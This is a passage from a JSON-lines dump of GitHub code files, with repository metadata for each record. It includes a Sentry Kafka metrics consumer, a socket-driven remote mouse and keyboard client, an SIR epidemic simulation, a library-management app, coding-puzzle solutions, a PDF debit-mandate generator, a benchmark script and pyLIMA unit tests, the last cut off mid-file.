= {\n msg.offset: json.loads(msg.payload.value.decode(\"utf-8\"), use_rapid_json=True)\n for msg in outer_message.payload\n }\n for message in parsed_payloads_by_offset.values():\n metric_name = message[\"name\"]\n org_id = message[\"org_id\"]\n tags = message.get(\"tags\", {})\n\n parsed_strings = {\n metric_name,\n *tags.keys(),\n *tags.values(),\n }\n org_strings[org_id].update(parsed_strings)\n strings.update(parsed_strings)\n\n metrics.incr(\"process_messages.total_strings_indexer_lookup\", amount=len(strings))\n\n with metrics.timer(\"metrics_consumer.bulk_record\"):\n mapping = indexer.bulk_record(org_strings)\n\n new_messages: List[Message[KafkaPayload]] = []\n\n with metrics.timer(\"process_messages.reconstruct_messages\"):\n for message in outer_message.payload:\n parsed_payload_value = parsed_payloads_by_offset[message.offset]\n new_payload_value = deepcopy(parsed_payload_value)\n\n metric_name = parsed_payload_value[\"name\"]\n org_id = parsed_payload_value[\"org_id\"]\n tags = parsed_payload_value.get(\"tags\", {})\n\n try:\n new_tags: Mapping[int, int] = {\n mapping[org_id][k]: mapping[org_id][v] for k, v in tags.items()\n }\n except KeyError:\n logger.error(\"process_messages.key_error\", extra={\"tags\": tags}, exc_info=True)\n continue\n\n new_payload_value[\"tags\"] = new_tags\n new_payload_value[\"metric_id\"] = mapping[org_id][metric_name]\n new_payload_value[\"retention_days\"] = 90\n\n del new_payload_value[\"name\"]\n\n new_payload = KafkaPayload(\n key=message.payload.key,\n value=json.dumps(new_payload_value).encode(),\n headers=message.payload.headers,\n )\n new_message = Message(\n partition=message.partition,\n offset=message.offset,\n payload=new_payload,\n timestamp=message.timestamp,\n )\n new_messages.append(new_message)\n\n 
metrics.incr(\"metrics_consumer.process_message.messages_seen\", amount=len(new_messages))\n\n return new_messages\n\n\nclass MetricsConsumerStrategyFactory(ProcessingStrategyFactory): # type: ignore\n def __init__(\n self,\n max_batch_size: int,\n max_batch_time: float,\n processes: int,\n input_block_size: int,\n output_block_size: int,\n ):\n self.__max_batch_time = max_batch_time\n self.__max_batch_size = max_batch_size\n\n self.__processes = processes\n\n self.__input_block_size = input_block_size\n self.__output_block_size = output_block_size\n\n def create(\n self, commit: Callable[[Mapping[Partition, Position]], None]\n ) -> ProcessingStrategy[KafkaPayload]:\n parallel_strategy = ParallelTransformStep(\n process_messages,\n ProduceStep(commit),\n self.__processes,\n max_batch_size=self.__max_batch_size,\n max_batch_time=self.__max_batch_time,\n input_block_size=self.__input_block_size,\n output_block_size=self.__output_block_size,\n initializer=initializer,\n )\n\n strategy = BatchMessages(parallel_strategy, self.__max_batch_time, self.__max_batch_size)\n\n return strategy\n\n\nclass BatchConsumerStrategyFactory(ProcessingStrategyFactory): # type: ignore\n \"\"\"\n Batching Consumer Strategy\n \"\"\"\n\n def __init__(\n self,\n max_batch_size: int,\n max_batch_time: float,\n commit_max_batch_size: int,\n commit_max_batch_time: int,\n ):\n self.__max_batch_time = max_batch_time\n self.__max_batch_size = max_batch_size\n self.__commit_max_batch_time = commit_max_batch_time\n self.__commit_max_batch_size = commit_max_batch_size\n\n def create(\n self, commit: Callable[[Mapping[Partition, Position]], None]\n ) -> ProcessingStrategy[KafkaPayload]:\n transform_step = TransformStep(\n next_step=SimpleProduceStep(\n commit,\n commit_max_batch_size=self.__commit_max_batch_size,\n # convert to seconds\n commit_max_batch_time=self.__commit_max_batch_time / 1000,\n )\n )\n strategy = BatchMessages(transform_step, self.__max_batch_time, self.__max_batch_size)\n return strategy\n\n\nclass TransformStep(ProcessingStep[MessageBatch]): # type: ignore\n \"\"\"\n Temporary Transform Step\n \"\"\"\n\n def __init__(\n self,\n next_step: ProcessingStep[KafkaPayload],\n ) -> None:\n self.__process_messages = process_messages\n self.__next_step = next_step\n self.__closed = False\n self.__metrics = get_metrics()\n\n def poll(self) -> None:\n self.__next_step.poll()\n\n def submit(self, message: Message[MessageBatch]) -> None:\n assert not self.__closed\n\n with self.__metrics.timer(\"transform_step.process_messages\"):\n transformed_message_batch = self.__process_messages(message)\n\n for transformed_message in transformed_message_batch:\n self.__next_step.submit(transformed_message)\n\n def close(self) -> None:\n self.__closed = True\n\n def terminate(self) -> None:\n self.__closed = True\n\n logger.debug(\"Terminating %r...\", self.__next_step)\n self.__next_step.terminate()\n\n def join(self, timeout: Optional[float] = None) -> None:\n self.__next_step.close()\n self.__next_step.join(timeout)\n\n\nclass UnflushedMessages(Exception):\n pass\n\n\nclass OutOfOrderOffset(Exception):\n pass\n\n\n@dataclass\nclass PartitionOffset:\n position: Position\n partition: Partition\n\n\nclass SimpleProduceStep(ProcessingStep[KafkaPayload]): # type: ignore\n def __init__(\n self,\n commit_function: Callable[[Mapping[Partition, Position]], None],\n commit_max_batch_size: int,\n commit_max_batch_time: float,\n ) -> None:\n snuba_metrics = settings.KAFKA_TOPICS[settings.KAFKA_SNUBA_METRICS]\n snuba_metrics_producer = 
Producer(\n kafka_config.get_kafka_producer_cluster_options(snuba_metrics[\"cluster\"]),\n )\n producer = snuba_metrics_producer\n self.__producer = producer\n self.__producer_topic = settings.KAFKA_TOPICS[settings.KAFKA_SNUBA_METRICS].get(\n \"topic\", \"snuba-metrics\"\n )\n self.__commit_function = commit_function\n\n self.__closed = False\n self.__metrics = get_metrics()\n self.__produced_message_offsets: MutableMapping[Partition, Position] = {}\n self.__callbacks = 0\n self.__started = time.time()\n # TODO: Need to make these flags\n self.__commit_max_batch_size = commit_max_batch_size\n self.__commit_max_batch_time = commit_max_batch_time\n self.__producer_queue_max_size = 80000\n self.__producer_long_poll_timeout = 3.0\n\n # poll duration metrics\n self.__poll_start_time = time.time()\n self.__poll_duration_sum = 0.0\n\n def _ready(self) -> bool:\n now = time.time()\n duration = now - self.__started\n if self.__callbacks >= self.__commit_max_batch_size:\n logger.info(\n f\"Max size reached: total of {self.__callbacks} messages after {duration:.{2}f} seconds\"\n )\n return True\n if now >= (self.__started + self.__commit_max_batch_time):\n logger.info(\n f\"Max time reached: total of {self.__callbacks} messages after {duration:.{2}f} seconds\"\n )\n return True\n\n return False\n\n def _record_poll_duration(self, poll_duration: float) -> None:\n self.__poll_duration_sum += poll_duration\n\n # record poll time durations every 5 seconds\n if (self.__poll_start_time + 5) < time.time():\n self.__metrics.timing(\"simple_produce_step.join_duration\", self.__poll_duration_sum)\n self.__poll_duration_sum = 0\n self.__poll_start_time = time.time()\n\n def poll_producer(self, timeout: float) -> None:\n with self.__metrics.timer(\"simple_produce_step.producer_poll_duration\", sample_rate=0.05):\n start = time.time()\n self.__producer.poll(timeout)\n end = time.time()\n\n poll_duration = end - start\n self._record_poll_duration(poll_duration)\n\n def poll(self) -> None:\n timeout = 0.0\n if len(self.__producer) >= self.__producer_queue_max_size:\n self.__metrics.incr(\n \"simple_produce_step.producer_queue_backup\", amount=len(self.__producer)\n )\n timeout = self.__producer_long_poll_timeout\n\n self.poll_producer(timeout)\n\n if self._ready():\n self.__commit_function(self.__produced_message_offsets)\n self.__callbacks = 0\n self.__produced_message_offsets = {}\n self.__started = time.time()\n\n def submit(self, message: Message[KafkaPayload]) -> None:\n position = Position(message.next_offset, message.timestamp)\n self.__producer.produce(\n topic=self.__producer_topic,\n key=None,\n value=message.payload.value,\n on_delivery=partial(self.callback, partition=message.partition, position=position),\n )\n\n def callback(self, error: Any, message: Any, partition: Partition, position: Position) -> None:\n if message and error is None:\n self.__callbacks += 1\n self.__produced_message_offsets[partition] = position\n if error is not None:\n raise Exception(error.str())\n\n def terminate(self) -> None:\n self.__closed = True\n\n def close(self) -> None:\n self.__closed = True\n\n def join(self, timeout: Optional[float]) -> None:\n with self.__metrics.timer(\"simple_produce_step.join_duration\"):\n if not timeout:\n timeout = 5.0\n self.__producer.flush(timeout)\n\n if self.__callbacks:\n logger.info(f\"Committing {self.__callbacks} messages...\")\n self.__commit_function(self.__produced_message_offsets)\n self.__callbacks = 0\n self.__produced_message_offsets = {}\n self.__started = 
time.time()\n\n\ndef get_streaming_metrics_consumer(\n    topic: str,\n    commit_max_batch_size: int,\n    commit_max_batch_time: int,\n    max_batch_size: int,\n    max_batch_time: float,\n    processes: int,\n    input_block_size: int,\n    output_block_size: int,\n    group_id: str,\n    auto_offset_reset: str,\n    factory_name: str,\n    **options: Mapping[str, Union[str, int]],\n) -> StreamProcessor:\n    if factory_name == \"multiprocess\":\n        processing_factory = MetricsConsumerStrategyFactory(\n            max_batch_size=max_batch_size,\n            max_batch_time=max_batch_time,\n            processes=processes,\n            input_block_size=input_block_size,\n            output_block_size=output_block_size,\n        )\n    else:\n        assert factory_name == \"default\"\n        processing_factory = BatchConsumerStrategyFactory(\n            max_batch_size=max_batch_size,\n            max_batch_time=max_batch_time,\n            commit_max_batch_size=commit_max_batch_size,\n            commit_max_batch_time=commit_max_batch_time,\n        )\n\n    create_topics([topic])\n\n    return StreamProcessor(\n        KafkaConsumer(get_config(topic, group_id, auto_offset_reset)),\n        Topic(topic),\n        processing_factory,\n    )\n","repo_name":"gms-ws-sandbox/sentry","sub_path":"src/sentry/sentry_metrics/multiprocess.py","file_name":"multiprocess.py","file_ext":"py","file_size_in_byte":23704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11842683989","text":"import mouse\r\nimport socket\r\nimport time\r\nimport keyboard\r\n\r\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nclient.connect((\"HOST_IP\", 8080))\r\nspecial_keys = [\"enter\", \"backspace\", \"space\", \"shift\", \"ctrl\", \"up\", \"down\", \"left\", \"right\"]\r\nprint(\"connected\")\r\nwhile True:\r\n    pos = \"\"\r\n    pos = client.recv(4096)\r\n    if pos.decode(\"utf8\") == \"lclick\":\r\n        print(\"click\")\r\n        mouse.click()\r\n    elif pos.decode(\"utf8\") == \"rclick\":\r\n        print(\"right click\")\r\n        mouse.click(button='right')\r\n    else:\r\n        pos1 = pos.decode(\"utf8\").split(\", \")\r\n        if len(pos1) < 2:\r\n            if len(pos1[0]) > 1:\r\n                print(pos1[0])\r\n                keyboard.press(pos1[0])\r\n            else:\r\n                print(pos1)\r\n                keyboard.write(pos1[0]) \r\n        else:\r\n            print(pos1)\r\n            mouse.move(pos1[0], pos1[1])","repo_name":"NoKodaAddictions/movemouse.py","sub_path":"movemouseClient.py","file_name":"movemouseClient.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72251692725","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom matplotlib import pyplot as plt\n\n# declare constants\nN = 1000.0\nI_0 = 1.0\nR_0 = 0.0\n\na = 1.0\nr = 0.002\n\ntimes = 50000\ndt = 0.001\n\n# initialize variables\nI = [I_0]\nR = [R_0]\nS = [N - I_0 - R_0]\nT = [0]\n\n# main loop\nfor i in range(1, times):\n    I.append(I[i-1] + (r * (N - I[i-1] - R[i-1]) * I[i-1] - a * I[i-1]) * dt)\n    R.append(R[i-1] + a * I[i-1] * dt)\n    S.append(N - I[i] - R[i])\n    T.append(T[i-1] + dt)\n\n# draw the plot\nsus, = plt.plot(T, S, color='b')\ninf, = plt.plot(T, I, color='r')\nrec, = plt.plot(T, R, color='g')\nplt.legend([sus, inf, rec], [u'susceptible', u'infected', u'recovered'])\nplt.xlabel(u'Time')\nplt.ylabel(u'Number of people')\nplt.show()\n","repo_name":"traducha/epidemics_DOKO2017","sub_path":"differential/sir.py","file_name":"sir.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33815448580","text":"import models\nimport time\n\nlibrary = models.Library(\"Knowledge Bank\")\nlibrarian = 
models.Librarian(\"mohamed\",\"mohamed@gmail.com\")\nlibrary.add_librarian(librarian)\n\n\ndef main_page():\n\n    print(\"############### Main Page ##############\\n\")\n    print(\"1- Display books\")\n    print(\"2- Search for a book\")\n    print(\"3- Add a book\")\n    print(\"4- Remove a book\")\n    print(\"5- Members Section\")\n    print(\"6- Exit\")\n\n\ndef get_key():\n    key = int(input(\"Enter a key: \"))\n    while not (1<=key<=6):\n        key = int(input(\"Enter a key between 1 and 6: \"))\n    \n    return key\n\n\ndef display_books():\n\n    print(\"#\"*50)\n\n    for title in library.books:\n        print(library.books[title])\n\n    print(\"#\"*50)\n\ndef search_for_book():\n\n    title = input(\"Enter the book title:\").title()\n    if title in library.books:\n        print(library.books[title])\n    else:\n        print(\"No results!\")\n\n\ndef add_book():\n    title = input(\"Enter the book's title:\").title()\n    author = input(\"Enter the book's author:\")\n    publishing_date = input(\"Enter the book's publishing_date:\")\n    copies = int(input(\"Enter the number of copies:\"))\n    while copies <= 0:\n        copies = int(input(\"Enter a valid number: \"))\n    new_book = models.Book(title,author,publishing_date,library,copies)\n    librarian.add_book(new_book)\n    print(\"Done!\")\n\ndef remove_book():\n    title = input(\"Enter the book's title:\").title()\n    if title not in library.books:\n        print(\"This book does not exist!\")\n    else:\n        book = library.books[title]\n        librarian.remove_book(book)\n        print(\"Done!\")\n\n\ndef members_section():\n    print(\"############## Members Section #############\")\n    print(\"1- Display members\")\n    print(\"2- add a member\")\n    print(\"3- remove a member\")\n    print(\"4- a member needs to borrow a book\")\n    print(\"5- a member needs to return a book\")\n    print(\"6- back to the main page\")\n\n\n\ndef display_members():\n\n    print(\"#\"*50)\n\n    for id in library.members:\n        print(library.members[id])\n\n    print(\"#\"*50)\n\n\ndef add_member():\n    name = input(\"Enter the member's name:\")\n    email = input(\"Enter the member's email:\")\n    new_member = models.Member(name,email)\n    librarian.add_member(new_member,library)\n    print(\"Done!\")\n\n\ndef remove_member():\n    id = int(input(\"Enter the member's id:\"))\n    if id not in library.members:\n        print(\"This id does not exist\")\n    else:\n        member = library.members[id]\n        librarian.remove_member(member,library)\n        print(\"Done!\")\n\n\ndef borrow_book():\n    id = int(input(\"Enter the member's id:\"))\n    if id not in library.members:\n        print(\"This id does not exist!!\")\n    else:\n        title = input(\"Enter the book's title:\").title()\n        if title not in library.books:\n            print(\"This book does not exist!!\")\n        elif not library.books[title].isavailable:\n            print(\"This book is not available now\")\n        else:\n            member = library.members[id]\n            book = library.books[title]\n            member.borrow(book)\n            print(\"Done!\")\n\n\ndef return_book():\n    id = int(input(\"Enter the member's id:\"))\n    if id not in library.members:\n        print(\"This id does not exist!!\")\n    else:\n        member = library.members[id]\n        title = input(\"Enter the book's title:\").title()\n        if title not in member.borrowed_books:\n            print(\"This book has not been borrowed by this member.\")\n        else:\n            book = member.borrowed_books[title]\n            member.return_book(book)\n            print(\"Done!\")\ndef app():\n\n    main_page()\n    key = get_key()\n\n    while True:\n\n        if key == 6:\n            print(\"Exiting...\")\n            return False\n        elif key == 1:\n            display_books()\n        elif key == 2:\n            search_for_book()\n        elif key == 3:\n            add_book()\n        elif key == 4:\n            remove_book()\n\n        while key == 5:\n            members_section()\n            k = get_key()\n\n            
if k == 1:\n                display_members()\n            elif k == 2:\n                add_member()\n            elif k == 3:\n                remove_member()\n            elif k == 4:\n                borrow_book()\n            elif k == 5:\n                return_book()\n            elif k == 6:\n                break\n            time.sleep(1)\n        \n        time.sleep(1)\n        main_page()\n        key = get_key()\n    \n\napp()\n\n","repo_name":"mohamedAbdelaleem/Library-management-system","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20077193627","text":"from check_login import login_check\nimport pytest\nimport allure\ndatas = [{'input_x':'su','even_x':'kw','check':{'code':0,'msg':'百度搜索成功!'}},\n         {'input_x':None,'even_x':'kw','check':{'code':0,'msg':'取值错误'}},\n         {'input_x':'su','even_x':None,'check':{'code':0,'msg':'取值错误'}},\n         {'input_x':'su','even_x':'qq','check':{'code':0,'msg':'百度搜索失败'}},\n         {'input_x':'ww','even_x':'kw','check':{'code':0,'msg':'百度搜索失败'}}]\n\n@pytest.mark.usefixtures('head')\nclass TestSearch:\n    @pytest.mark.parametrize('case',datas)\n    def test_search(self,case):\n        actual = login_check(case['input_x'],case['even_x'])\n        assert actual == case['check']\n@allure.title('Module test start')\ndef test_module():\n    print('test session started')","repo_name":"Elt-wlj/learn","sub_path":"LogTest/testcase/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"553953665","text":"class Solution:\n    def mincostTickets(self, days: List[int], cost: List[int]) -> int:\n        n = len(days)\n        dp = [0 for i in range(days[-1]+1)]\n        \n        \n        for i in range(1,len(dp)):\n            if i in days:\n                dp[i] = min(dp[i-1]+cost[0],dp[max(i-7,0)]+cost[1],dp[max(i-30,0)]+cost[2])\n            else:\n                dp[i] = dp[i-1]\n        \n        print(dp)\n        return dp[-1]","repo_name":"DhruvSrivastava-16/LEETCODE-PRACTISE-","sub_path":"983-minimum-cost-for-tickets/983-minimum-cost-for-tickets.py","file_name":"983-minimum-cost-for-tickets.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"40940768929","text":"\nimport os\nfrom fpdf import FPDF\nfrom datetime import datetime, timedelta\nfrom authsys_common.dates import add_month\nimport calendar\n\nMAX_X = 210\nMAX_Y = 297\n\ndef get_next_monday():\n    today = datetime.now().replace(hour=0, minute=0, second=0)\n    while today.weekday() != 0:\n        today += timedelta(days=1)\n    return today\n\ndef add_ending(day):\n    if day in (1, 21, 31):\n        day = str(day) + 'st'\n    elif day in (2, 22):\n        day = str(day) + 'nd'\n    elif day in (3, 23):\n        day = str(day) + 'rd'\n    else:\n        day = str(day) + 'th'\n    return day\n\ndef create_mandate(member_id, name, address, bank, branch_code, account_number, account_type,\n                   price, phone, charge_day):\n    f = FPDF('P', 'mm', 'A4')\n    f.add_page()\n    pth = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'mandate3.png')\n    f.image(pth, 0, 0, MAX_X, MAX_Y)\n    f.set_font('Courier', '', 12)\n    f.text(85, 68, name)\n    f.text(33, 75, address)\n    f.text(27, 81, bank)\n    f.text(43, 88, branch_code)\n    f.text(133, 88, account_number)\n    if account_type != \"1\":\n        f.line(45, 94.5, 80, 94.5)\n    if account_type != \"2\":\n        f.line(83, 94.5, 100, 94.5)\n    if account_type != \"3\":\n        f.line(101, 94.5, 125, 94.5)\n    now = datetime.now()\n    f.text(31, 101, \"R\" + str(price))\n    f.text(86, 101, now.strftime(\"%d/%b/%Y\"))\n    f.text(164, 101, phone)\n    f.text(140, 122, now.strftime(\"%d/%b/%Y\"))\n\n    # calculate detailed charges\n    days_in_month = calendar.monthrange(now.year, 
now.month)[1]\n #price_per_day = price / days_in_month\n first_charge = price # price_per_day * (days_in_month - now.day)\n first_charge_day = datetime.now().replace(minute=0, hour=0, second=0, day=charge_day)\n if charge_day < datetime.now().day + 5:\n # should be always true\n # first_charge += price\n first_charge_day = add_month(first_charge_day)\n\n f.text(74, 146, \"R%.2f\" % first_charge)\n f.text(123, 146, first_charge_day.strftime(\"%d/%b/%Y\"))\n\n f.text(84, 151, \"R%.2f\" % price)\n f.text(122, 151, add_ending(charge_day))\n f.text(30, 160.5, add_ending(charge_day))\n\n f.text(30, 257, \"Cape Town\")\n f.text(75, 257, add_ending(now.day))\n f.text(100, 257, now.strftime(\"%B\"))\n f.text(60, 278.6, \"B11-\" + str(member_id))\n# f.set_font('Arial', '', 6)\n# f.text()\n \n return f.output(dest='S')\n\nif __name__ == '__main__':\n s = create_mandate(member_id=123, name='Maciej Fijalkowski', address=\"Pizdowo 16\",\n bank='First National Bank', branch_code='123456', account_number='4353234432',\n account_type=\"1\", price=450, phone=\"12334435\", charge_day=13)\n open(\"out.pdf\", \"w\").write(s)","repo_name":"fijal/authsys-common","sub_path":"authsys_common/mandate.py","file_name":"mandate.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15740684909","text":"import fast.fast as ft\nimport numpy as np\nimport time, json, cpuinfo\n\nlimit = 50000000 # Try to limit limit to 10 000 / 50 000\nsize = 5\nnpy = []\ncpu_list = []\ncpuEx_list = []\ngpu_list = []\n\ngpu = ft.gpu()\ncpu = ft.cpu()\n\n\nwhile(True):\n A = [x * 0.183736125 for x in range(0, size)]\n C = []\n\n start_time1 = time.perf_counter()\n C = np.multiply(A, A)\n time_taken1 = time.perf_counter() - start_time1\n npy.append(time_taken1)\n\n start_time2 = time.perf_counter()\n C = cpu.ExMul(A, A)\n time_taken2 = time.perf_counter() - start_time2\n cpuEx_list.append(time_taken2)\n\n start_time = time.perf_counter()\n C = cpu.mul(A, A, 0)\n time_taken = time.perf_counter() - start_time\n cpu_list.append(time_taken)\n\n start_time3 = time.perf_counter()\n C = gpu.mul(A, A)\n time_taken = time.perf_counter() - start_time3\n gpu_list.append(time_taken)\n\n print(\"Completed Test Number : {}\".format(size) )\n\n if size >= limit:\n break\n \n size = size * 10\n\n \nbnmk = dict()\nbnmk['Test'] = 'Python CXX Wrapper Benchmark'\nbnmk['CPU/GPU Used'] = cpuinfo.get_cpu_info()['brand'] \nbnmk['numpy'] = npy\nbnmk['cpu'] = cpu_list\nbnmk['cpuEx'] = cpuEx_list\nbnmk['gpu'] = gpu_list\n \njsonfile = 'wrapper_test_new.json'\n\nwith open(jsonfile, 'w') as json_file:\n json.dump(bnmk, json_file)\n\nprint(\"Benchmarking Complete!\")\n","repo_name":"Anand270294/Fast","sub_path":"Example/benchmarker.py","file_name":"benchmarker.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71805702966","text":"'''Variable Names\nA variable can have a short name (like x and y) or a more descriptive name (age, carname, total_volume). 
Rules for Python variables:\nA variable name must start with a letter or the underscore character\nA variable name cannot start with a number\nA variable name can only contain alpha-numeric characters and underscores (A-z, 0-9, and _ )\nVariable names are case-sensitive (age, Age and AGE are three different variables)'''\n\n\nmyvar = \"John\"\nmy_var = \"John\"\n_my_var = \"John\"\nmyVar = \"John\"\nMYVAR = \"John\"\nmyvar2 = \"John\"\n\nprint(myvar)\n\n'''\nIllegal variable names:\n2myvar = \"John\"\nmy-var = \"John\"\nmy var = \"John\"\n'''","repo_name":"ValentineFernandes/Python","sub_path":"variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"20814864121","text":"\"\"\"Project Euler Problem 24 - Lexicographic permutations\"\"\"\n\n\ndef factorial(number):\n\t\"\"\" simple factorial function, can also use import math for math.factorial() for a faster built in function\n\n\t:param number: Int - the number we want to calculate the factorial of\n\t:return: Int - the final product\n\t\"\"\"\n\tproduct = 1\n\tfor each in range(1, number+1):\n\t\tproduct *= each\n\treturn product\n\n\ndef nth_permutation(objects, target):\n\t\"\"\" calculates the nth lexicographic permutation given a pre-ordered list of objects\n\n\t:param objects: List - a list of objects (hopefully ordered) we don't sort in function because it might be odd types\n\t:param target: int - the index target of all possible permutations in order\n\t:return: list/string - if function call is out of range return string, otherwise return list for the permutation\n\t\"\"\"\n\t# catch calls out of range of total number of permutations\n\tif target > factorial(len(objects)) or target < 1:\n\t\treturn \"out of range\"\n\tpermutation = []\n\t# while we have objects to choose from\n\twhile len(objects) > 0:\n\t\t# to figure out the first object slot, calculate how many permutations will pass per choice\n\t\tfactorial_num = factorial(len(objects)-1)\n\t\t# we want only the next lowest integer that will fit wholly, if we use floored division we\n\t\t# will get wrong results for divisions that result in whole number naturally\n\t\ti = target / factorial_num\n\t\t# if the float is a whole number subtract 1\n\t\tif i.is_integer():\n\t\t\ti = i-1\n\t\t# discard remainder\n\t\ti = int(i)\n\t\t# subtract skipped iterations from the target\n\t\ttarget -= i * factorial_num\n\t\t# append the object to the solution permutation and remove it before looping\n\t\tpermutation.append(objects[i])\n\t\tobjects.remove(objects[i])\n\treturn permutation\n\n\nif __name__ == \"__main__\":\n\tN = 1000000\n\tunique_objects = [_ for _ in range(10)]\n\tprint(f\"The {N}(th) lexicographic permutation of\", unique_objects.copy(), \"is\", nth_permutation(unique_objects, N))\n","repo_name":"HCrescent/Project-Euler","sub_path":"Python/001-050/alternate solutions/Problem 024-2.py","file_name":"Problem 024-2.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25028681941","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 7 15:46:17 2015\n\n@author: ebachelet\n\"\"\"\nimport unittest.mock as mock\nimport numpy as np\nimport collections\nfrom collections import OrderedDict\n\nfrom pyLIMA import microlfits\nfrom pyLIMA import microlmodels\n\n\ndef _create_event():\n event = mock.MagicMock()\n event.telescopes = 
[mock.MagicMock()]\n event.telescopes[0].name = 'Test'\n event.telescopes[0].lightcurve_flux = np.random.random((100, 3))\n\n event.telescopes[0].lightcurve_magnitude = np.random.random((100, 3))\n event.telescopes[0].filter = 'I'\n event.telescopes[0].gamma = 0.5\n event.total_number_of_data_points.return_value = sum([len(i.lightcurve_flux) for i in event.telescopes])\n return event\n\n\ndef _create_model(kind):\n model = mock.MagicMock()\n model.parameters_guess = []\n model.parameters_boundaries = [[0, 100], [0, 1], [0, 300]]\n model.Jacobian_flag = 'Not OK'\n \n model_dictionnary = {'to': 0, 'uo': 1, 'tE': 2, 'fs_Test': 3, 'g_Test': 4}\n model.model_dictionnary = OrderedDict(\n sorted(model_dictionnary.items(), key=lambda x: x[1]))\n\n model.pyLIMA_standards_dictionnary = model.model_dictionnary\n model.compute_the_microlensing_model.return_value = np.random.random(100).tolist(), 0.0,0.0\n model.model_magnification.return_value = np.random.random(100).tolist()\n fancy_namedtuple = collections.namedtuple('Parameters', model.model_dictionnary.keys())\n model.pyLIMA_standard_parameters_to_fancy_parameters.return_value = fancy_namedtuple(10.0, 0.1, 20, 10, 5)\n model.model_type = kind\n model.model_Jacobian.return_value = np.random.random((100,6)).T\n model.derive_telescope_flux.return_value = 42, 69\n model.compute_pyLIMA_parameters.return_value = np.random.uniform(0,2,len(model.model_dictionnary.keys()))\n \n return model\n\n\ndef test_mlfit_PSPL_LM_without_guess():\n current_event = _create_event()\n model = model = microlmodels.create_model('PSPL',current_event)\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (3 + 2 * len(current_event.telescopes), 3 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 3 + 2 * len(current_event.telescopes) + 1\n\n\ndef test_mlfit_FSPL_LM_without_guess():\n current_event = _create_event()\n model = model = microlmodels.create_model('FSPL',current_event)\n\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (4 + 2 * len(current_event.telescopes), 4 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 4 + 2 * len(current_event.telescopes) + 1\n\n\ndef test_mlfit_DSPL_LM_without_guess():\n current_event = _create_event()\n \n model = model = microlmodels.create_model('DSPL',current_event)\n\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (6 + 2 * len(current_event.telescopes), 6 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 6 + 2 * len(current_event.telescopes) + 1\n\n\ndef test_mlfit_PSPL_LM_with_guess():\n current_event = _create_event()\n model = microlmodels.create_model('PSPL',current_event)\n\n model.parameters_guess = [10, 0.1, 20]\n\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (3 + 2 * len(current_event.telescopes), 3 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 3 + 2 * len(current_event.telescopes) + 1\n\ndef test_mlfit_FSPL_LM_with_guess():\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n\n model.parameters_boundaries = [[0, 100], [0, 1], [0, 300], [0, 1]]\n fit = microlfits.MLFits(current_event)\n fit.mlfit(model, 'LM')\n\n assert fit.fit_covariance.shape == (4 + 2 * len(current_event.telescopes), 4 + 2 * len(current_event.telescopes))\n assert len(fit.fit_results) == 4 + 2 * 
len(current_event.telescopes) + 1\n\n#def test_mlfit_PSPL_MCMC_with_guess():\n# current_event = _create_event()\n# model = _create_model('PSPL')\n \n# fit = microlfits.MLFits(current_event)\n# fit.mlfit(model, 'MCMC',flux_estimation_MCMC='polyfit')\n\n\n# assert fit.MCMC_chains.shape == (240000, 6)\n\n\ndef test_check_fit_bad_covariance():\n current_event = _create_event()\n model = _create_model('PSPL')\n fit = microlfits.MLFits(current_event)\n fit.fit_covariance = np.array([[-1.0, 0.0], [0.0, 0.0]])\n\n flag = fit.check_fit()\n\n assert flag == 'Bad Fit'\n\n\ndef test_check_fit_bad_rho():\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n model.define_model_parameters()\n fit = microlfits.MLFits(current_event)\n fit.model = model\n fit.fit_results = [0.0, 0.0, 0.0, -1.0, 1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Bad Fit'\n\n fit.fit_results = [0.0, 0.0, 0.0, 0.8, 1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Bad Fit'\n\n fit.fit_results = [0.0, 0.0, 0.0, 0.05, 1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Good Fit'\n\n\ndef test_check_fit_source_flux():\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n model.define_model_parameters()\n\n fit = 